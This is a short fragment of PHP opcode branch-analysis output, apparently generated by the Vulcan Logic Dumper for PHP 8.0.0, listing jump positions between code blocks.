Branch analysis from position: 90
2 jumps found. (Code = 44) Position 1 = 93, Position 2 = 51
Branch analysis from position: 93
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 51
2 jumps found. (Code = 43) Position 1 = 56, Position 2 = 57
Branch analysis from position: 56
1 jumps found. (Code = 42) Position 1 = 89
Branch analysis from position: 89
2 jumps found. (Code = 44) Position 1 = 93, Position 2 = 51
Branch analysis from position: 93
Branch analysis from position: 51
Branch analysis from position: 57
2 jumps found. (Code = 44) Position 1 = 93, Position 2 = 51
Branch analysis from position: 93

Generated using Vulcan Logic Dumper, using php 8.0.0

